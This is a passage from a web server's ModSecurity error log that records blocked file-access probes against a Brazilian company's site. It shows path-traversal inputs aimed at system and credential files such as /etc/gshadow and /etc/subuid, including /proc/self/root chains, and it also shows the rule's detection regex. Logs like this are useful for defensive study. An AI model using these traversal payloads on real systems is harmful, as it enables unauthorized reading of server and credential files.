[Fri Mar 20 09:00:06.823262 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:43072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02xjJ3M9BSuKP7CAYqowAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:00:07.743988 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.124:37140] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02xzJ3M9BSuKP7CAYqpAAAAJY"]
[Fri Mar 20 09:00:07.984156 2026] [:error] [pid 11167:tid 140411741927168] [client 57.141.18.29:37138] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02x_HIg5MgXLBnicMCiwAAAcA"]
[Fri Mar 20 09:00:08.571394 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.7:37152] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02yPqxLDW4GITHUkT1EAAAARg"]
[Fri Mar 20 09:00:08.596548 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:43084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02yOoXxyEfFpUF8f-MJgAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:00:10.173586 2026] [:error] [pid 11167:tid 140411607643904] [client 57.141.18.28:37114] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02yvHIg5MgXLBnicMCkAAAAdA"]
[Fri Mar 20 09:00:11.079887 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.9:37218] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02y9a6ubjKNq_cu4biEAAAA0o"]
[Fri Mar 20 09:00:13.022216 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.76:37246] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02zOoXxyEfFpUF8f-MKQAAAUE"]
[Fri Mar 20 09:00:14.110606 2026] [:error] [pid 9818:tid 140411557287680] [client 57.141.18.10:37230] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02zl1pVZ5mVmJwsFM9YgAAAFY"]
[Fri Mar 20 09:00:16.771788 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.64:37380] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab020BCii7xarUs8iHZzLQAAAhU"]
[Fri Mar 20 09:00:25.639303 2026] [:error] [pid 31215:tid 140411616036608] [client 57.141.18.41:37610] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab022QF0L0L-SsrnPo50fAAAAs8"]
[Fri Mar 20 09:00:32.023086 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.243.128:44612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab024PXLqtnMIWvjpaKmZgAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:00:32.363987 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.98:37766] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab024PXLqtnMIWvjpaKmZwAAApA"]
[Fri Mar 20 09:00:42.734553 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.243.128:53516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab026hCii7xarUs8iHZzRgAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:00:44.063992 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:34558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab027BCii7xarUs8iHZzRwAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:00:45.999208 2026] [:error] [pid 21219:tid 140411599251200] [client 57.141.18.115:38322] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab027fXLqtnMIWvjpaKmbgAAApE"]
[Fri Mar 20 09:00:51.271677 2026] [:error] [pid 11642:tid 140411725141760] [client 57.141.18.87:38418] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab0287ninkcc-iUj5App1AAAA4I"]
[Fri Mar 20 09:01:12.164429 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.9:39424] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03CNa6ubjKNq_cu4biQgAAA1g"]
[Fri Mar 20 09:01:13.294035 2026] [mime_magic:error] [pid 10189:tid 140411565680384] (70014)End of file found: [client 216.73.216.191:39486] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:01:14.339341 2026] [:error] [pid 11642:tid 140411666392832] [client 57.141.18.15:39556] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03Crninkcc-iUj5App8AAAA4k"]
[Fri Mar 20 09:01:16.016247 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.60:39588] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DPqxLDW4GITHUkT1VAAAARE"]
[Fri Mar 20 09:01:16.427716 2026] [:error] [pid 10189:tid 140411658000128] [client 57.141.18.103:39620] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DDJ3M9BSuKP7CAYq7AAAAIo"]
[Fri Mar 20 09:01:16.547445 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.66:39630] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DDJ3M9BSuKP7CAYq7QAAAI4"]
[Fri Mar 20 09:01:16.775206 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.6:39648] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DOoXxyEfFpUF8f-MTgAAAUE"]
[Fri Mar 20 09:01:17.043399 2026] [:error] [pid 9818:tid 140411590858496] [client 57.141.18.17:39654] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DV1pVZ5mVmJwsFM9rgAAAFI"]
[Fri Mar 20 09:01:17.427905 2026] [:error] [pid 10189:tid 140411599251200] [client 57.141.18.116:39460] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DTJ3M9BSuKP7CAYq7wAAAJE"]
[Fri Mar 20 09:01:18.103877 2026] [:error] [pid 11642:tid 140411699963648] [client 57.141.18.83:39702] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03Drninkcc-iUj5App9AAAA4U"]
[Fri Mar 20 09:01:18.331853 2026] [:error] [pid 11167:tid 140411658000128] [client 57.141.18.20:39720] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri 